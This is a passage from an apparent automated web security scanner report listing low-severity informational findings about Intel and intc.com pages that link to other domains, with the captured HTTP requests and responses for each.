User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A20%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:20 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:20 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:20 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="gaat40-header" class="gaat40-reset gaat40-https">
<a class="gaat40-logo" title="" href="http://www.intel.com/index.htm">
               
               <script type="text/javascript">
...[SNIP]...
<li id="gaat40-locale">
<a href="http://www.intel.com/en_US/worldwide.htm">Change Location</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-hdr_link_bus">
<a href="http://www.intel.com/business/index.htm?iid=hdr+business">For Business</a>
...[SNIP]...
<li class="" id="gaat40-hdr_link_home">
<a href="http://www.intel.com/consumer/index.htm?iid=hdr+home">For Home</a>
...[SNIP]...
<li class="" id="gaat40-hdr_link_support">
<a href="http://www.intel.com/p/en_US/support?iid=hdr+support">Support</a>
...[SNIP]...
<li class=" gaat40-selected" id="gaat40-hdr_link_about">
<a href="http://www.intel.com/intel/index.htm?iid=hdr+about">About Intel</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_cr">
<a href="http://www.intel.com/intel/corpresponsibility/index.htm?iid=subhdr+cr">Corporate Responsibility</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_cr_col1_1">
<a href="http://www.intel.com/intel/cr/gcr/overview.htm?iid=subhdr+cr_report">Corporate Responsibility Report</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_2">
<a href="http://www.intel.com/intel/education/index.htm?iid=subhdr+cr_edu">Education</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_3">
<a href="http://www.intel.com/intel/environment/index.htm?iid=subhdr+cr_environ">Environment</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_4">
<a href="http://www.intel.com/about/companyinfo/capital/index.htm">Healthcare</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_5">
<a href="http://www.intel.com/intel/foundation/index.htm?iid=subhdr+cr_foundation">Intel Foundation</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_6">
<a href="http://www.intel.com/community/index.htm?iid=subhdr+cr_community">Intel in Your Community</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_7">
<a href="http://www.intel.com/about/companyinfo/worldahead/index.htm">World Ahead</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_info">
<a href="http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info">Company Information</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_info_col1_1">
<a href="http://www.intel.com/about/companyinfo/diversity/index.htm">Diversity</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_2">
<a href="http://www.intel.com/about/companyinfo/FAQ/index.htm">FAQs</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_3">
<a href="http://www.intel.com/about/companyinfo/capital/index.htm">Intel Capital</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_4">
<a href="http://www.intel.com/about/companyinfo/museum/index.htm">Intel Museum</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_6">
<a href="http://www.intel.com/jobs/index.htm?iid=subhdr+info_jobs">Jobs at Intel</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_7">
<a href="http://newsroom.intel.com/community/intel_newsroom/">Intel Newsroom</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_8">
<a href="http://www.intel.com/about/companyinfo/policy/index.htm">Public Policy</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_tech-lead">
<a href="http://www.intel.com/technology/index.htm?iid=subhdr+tl">Technology Leadership</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_tech-lead_col1_1">
<a href="http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tl_arch-silicon">Architecture and Silicon</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_2">
<a href="http://www.intel.com/technology/product/index.htm?iid=subhdr+tl_prod-tech">Product Technologies</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_3">
<a href="http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tl_manufacturing">Manufacturing</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_4">
<a href="http://techresearch.intel.com/articles/index.html?iid=subhdr+tl_research">Research</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_5">
<a href="http://www.intel.com/standards/index.htm?iid=subhdr+tl_standards">Standards</a>
...[SNIP]...
<li class="gaat40-first">
<a href="http://www.intel.com/products/index.htm?iid=hdr+product-index">Product Index</a>
...[SNIP]...
<li class="">
<a href="http://communities.intel.com/index.jspa?iid=hdr+communities">Communities</a>
...[SNIP]...
<li class="">
<a href="http://www.intel.com/experience/index.htm?iid=hdr+experience">Experience Intel</a>
...[SNIP]...
</span>

                       <a href="http://newsroom.intel.com/community/intel_newsroom/">INTEL NEWSROOM</a>

                       <a href="http://www.intel.com/jobs/index.htm">JOBS AT INTEL</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/capital/index.htm">INTEL CAPITAL</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/diversity/index.htm">DIVERSITY</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/museum/index.htm">INTEL MUSEUM</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/policy/index.htm">Public Policy</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/FAQ/index.htm">F.A.Q.<span class="lowercase">
...[SNIP]...
<li><a href="http://www.intel.com/" title="Home">Home</a>
...[SNIP]...
<li><a href="http://www.intel.com/intel/index.htm?iid=hdr+about" title="About Intel">About&nbsp;Intel</a>
...[SNIP]...
<div class="mini-promo-text">
                               <a href="http://www.theinvestornetwork.com/forum/intc" title="Join the Intel Investors Community" target="_blank">Join the Intel Investors Community&nbsp;&gt;</a>
...[SNIP]...
<li class="gaat40-first">
<a href="http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms">Terms of Use</a>
...[SNIP]...
<li>
<a href="http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark">*Trademarks</a>
...[SNIP]...
<li>
<a href="http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy">Privacy</a>
...[SNIP]...

17.30. http://www.intc.com/videoDetail.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /videoDetail.cfm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intc.com/videoDetail.cfm?eventid=81741
The response contains the following links to other domains:
  • http://communities.intel.com/index.jspa?iid=hdr+communities
  • http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
  • http://newsroom.intel.com/community/intel_newsroom/
  • http://techresearch.intel.com/articles/index.html?iid=subhdr+tl_research
  • http://www.intel.com/
  • http://www.intel.com/about/companyinfo/FAQ/index.htm
  • http://www.intel.com/about/companyinfo/capital/index.htm
  • http://www.intel.com/about/companyinfo/diversity/index.htm
  • http://www.intel.com/about/companyinfo/museum/index.htm
  • http://www.intel.com/about/companyinfo/policy/index.htm
  • http://www.intel.com/about/companyinfo/worldahead/index.htm
  • http://www.intel.com/business/index.htm?iid=hdr+business
  • http://www.intel.com/community/index.htm?iid=subhdr+cr_community
  • http://www.intel.com/consumer/index.htm?iid=hdr+home
  • http://www.intel.com/en_US/worldwide.htm
  • http://www.intel.com/experience/index.htm?iid=hdr+experience
  • http://www.intel.com/index.htm
  • http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info
  • http://www.intel.com/intel/corpresponsibility/index.htm?iid=subhdr+cr
  • http://www.intel.com/intel/cr/gcr/overview.htm?iid=subhdr+cr_report
  • http://www.intel.com/intel/education/index.htm?iid=subhdr+cr_edu
  • http://www.intel.com/intel/environment/index.htm?iid=subhdr+cr_environ
  • http://www.intel.com/intel/foundation/index.htm?iid=subhdr+cr_foundation
  • http://www.intel.com/intel/index.htm?iid=hdr+about
  • http://www.intel.com/jobs/index.htm
  • http://www.intel.com/jobs/index.htm?iid=subhdr+info_jobs
  • http://www.intel.com/p/en_US/support?iid=hdr+support
  • http://www.intel.com/products/index.htm?iid=hdr+product-index
  • http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy
  • http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms
  • http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark
  • http://www.intel.com/standards/index.htm?iid=subhdr+tl_standards
  • http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tl_arch-silicon
  • http://www.intel.com/technology/index.htm?iid=subhdr+tl
  • http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tl_manufacturing
  • http://www.intel.com/technology/product/index.htm?iid=subhdr+tl_prod-tech
  • http://www.theinvestornetwork.com/forum/intc

Request

GET /videoDetail.cfm?eventid=81741 HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:16:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A14%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:14 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:14 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:14 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="gaat40-header" class="gaat40-reset gaat40-https">
<a class="gaat40-logo" title="" href="http://www.intel.com/index.htm">
               
               <script type="text/javascript">
...[SNIP]...
<li id="gaat40-locale">
<a href="http://www.intel.com/en_US/worldwide.htm">Change Location</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-hdr_link_bus">
<a href="http://www.intel.com/business/index.htm?iid=hdr+business">For Business</a>
...[SNIP]...
<li class="" id="gaat40-hdr_link_home">
<a href="http://www.intel.com/consumer/index.htm?iid=hdr+home">For Home</a>
...[SNIP]...
<li class="" id="gaat40-hdr_link_support">
<a href="http://www.intel.com/p/en_US/support?iid=hdr+support">Support</a>
...[SNIP]...
<li class=" gaat40-selected" id="gaat40-hdr_link_about">
<a href="http://www.intel.com/intel/index.htm?iid=hdr+about">About Intel</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_cr">
<a href="http://www.intel.com/intel/corpresponsibility/index.htm?iid=subhdr+cr">Corporate Responsibility</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_cr_col1_1">
<a href="http://www.intel.com/intel/cr/gcr/overview.htm?iid=subhdr+cr_report">Corporate Responsibility Report</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_2">
<a href="http://www.intel.com/intel/education/index.htm?iid=subhdr+cr_edu">Education</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_3">
<a href="http://www.intel.com/intel/environment/index.htm?iid=subhdr+cr_environ">Environment</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_4">
<a href="http://www.intel.com/about/companyinfo/capital/index.htm">Healthcare</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_5">
<a href="http://www.intel.com/intel/foundation/index.htm?iid=subhdr+cr_foundation">Intel Foundation</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_6">
<a href="http://www.intel.com/community/index.htm?iid=subhdr+cr_community">Intel in Your Community</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_7">
<a href="http://www.intel.com/about/companyinfo/worldahead/index.htm">World Ahead</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_info">
<a href="http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info">Company Information</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_info_col1_1">
<a href="http://www.intel.com/about/companyinfo/diversity/index.htm">Diversity</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_2">
<a href="http://www.intel.com/about/companyinfo/FAQ/index.htm">FAQs</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_3">
<a href="http://www.intel.com/about/companyinfo/capital/index.htm">Intel Capital</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_4">
<a href="http://www.intel.com/about/companyinfo/museum/index.htm">Intel Museum</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_6">
<a href="http://www.intel.com/jobs/index.htm?iid=subhdr+info_jobs">Jobs at Intel</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_7">
<a href="http://newsroom.intel.com/community/intel_newsroom/">Intel Newsroom</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_8">
<a href="http://www.intel.com/about/companyinfo/policy/index.htm">Public Policy</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_tech-lead">
<a href="http://www.intel.com/technology/index.htm?iid=subhdr+tl">Technology Leadership</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_tech-lead_col1_1">
<a href="http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tl_arch-silicon">Architecture and Silicon</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_2">
<a href="http://www.intel.com/technology/product/index.htm?iid=subhdr+tl_prod-tech">Product Technologies</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_3">
<a href="http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tl_manufacturing">Manufacturing</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_4">
<a href="http://techresearch.intel.com/articles/index.html?iid=subhdr+tl_research">Research</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_5">
<a href="http://www.intel.com/standards/index.htm?iid=subhdr+tl_standards">Standards</a>
...[SNIP]...
<li class="gaat40-first">
<a href="http://www.intel.com/products/index.htm?iid=hdr+product-index">Product Index</a>
...[SNIP]...
<li class="">
<a href="http://communities.intel.com/index.jspa?iid=hdr+communities">Communities</a>
...[SNIP]...
<li class="">
<a href="http://www.intel.com/experience/index.htm?iid=hdr+experience">Experience Intel</a>
...[SNIP]...
<li><a href="http://www.theinvestornetwork.com/forum/intc" target="_blank">Intel Investors Community</a>
...[SNIP]...
</span>

                       <a href="http://newsroom.intel.com/community/intel_newsroom/">INTEL NEWSROOM</a>

                       <a href="http://www.intel.com/jobs/index.htm">JOBS AT INTEL</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/capital/index.htm">INTEL CAPITAL</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/diversity/index.htm">DIVERSITY</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/museum/index.htm">INTEL MUSEUM</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/policy/index.htm">Public Policy</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/FAQ/index.htm">F.A.Q.<span class="lowercase">
...[SNIP]...
<li><a href="http://www.intel.com/" title="Home">Home</a>
...[SNIP]...
<li><a href="http://www.intel.com/intel/index.htm?iid=hdr+about" title="About Intel">About&nbsp;Intel</a>
...[SNIP]...
<div align="center"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0" width="448" height="340" id="video" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<div class="mini-promo-text">
                               <a href="http://www.theinvestornetwork.com/forum/intc" title="Join the Intel Investors Community" target="_blank">Join the Intel Investors Community&nbsp;&gt;</a>
...[SNIP]...
<li class="gaat40-first">
<a href="http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms">Terms of Use</a>
...[SNIP]...
<li>
<a href="http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark">*Trademarks</a>
...[SNIP]...
<li>
<a href="http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy">Privacy</a>
...[SNIP]...

17.31. http://www.intel.co.jp/jp/business/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.co.jp
Path:   /jp/business/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.co.jp/jp/business/index.htm?iid=gg_ja_JP+noscript
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr-JP+invrel

Request

GET /jp/business/index.htm?iid=gg_ja_JP+noscript HTTP/1.1
Host: www.intel.co.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:21:10 GMT
Content-Length: 30080
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="ja-jp">
<head>
<meta http-equiv=Content-Type content="text/html; charset=utf-8">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr-JP+invrel">..................... (......)</a>
...[SNIP]...

17.32. http://www.intel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/?en_US_01
The response contains the following links to other domains:
  • http://www.intc.com/?iid=gg_about+home_intc
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /?en_US_01 HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947547820; s_lv_s=Less%20than%201%20day; cf=1; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 23:12:02 GMT
Connection: close
Content-Length: 24825

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-US">
<head>
<title
...[SNIP]...
<li><a class="hoverlink" href="http://www.intc.com/?iid=gg_about+home_intc">Investor Relations</a>
...[SNIP]...
<li><a class="hoverlink" href="http://www.intc.com/?iid=gg_about+home_intc">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.33. http://www.intel.com/about/companyinfo/FAQ/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/companyinfo/FAQ/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/companyinfo/FAQ/index.htm?iid=subhdr+info_faqs
The response contains the following links to other domains:
  • http://www.intc.com/
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/companyinfo/FAQ/index.htm?iid=subhdr+info_faqs HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:40 GMT
Content-Length: 32375
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
</a>
<a id="LHC-investor-relations-menu" href="http://www.intc.com">Investor Relations</a>
...[SNIP]...
<p>The number of Intel employees can be found in our <a href="http://www.intc.com" target="_blank">annual report</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.34. http://www.intel.com/about/companyinfo/capital/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/companyinfo/capital/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/companyinfo/capital/index.htm?iid=subhdr+info_captial
The response contains the following links to other domains:
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.flickr.com/photos/intelcapital/sets/
  • http://www.intc.com/
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.linkedin.com/groups?gid=1846591&trk=hb_side_g
  • http://www.twitter.com/intelcapital
  • http://www.youtube.com/view_play_list?p=1C48A59E34F0BFD5
  • https://www.intelportfolio.com/cps/newsletter/

Request

GET /about/companyinfo/capital/index.htm?iid=subhdr+info_captial HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
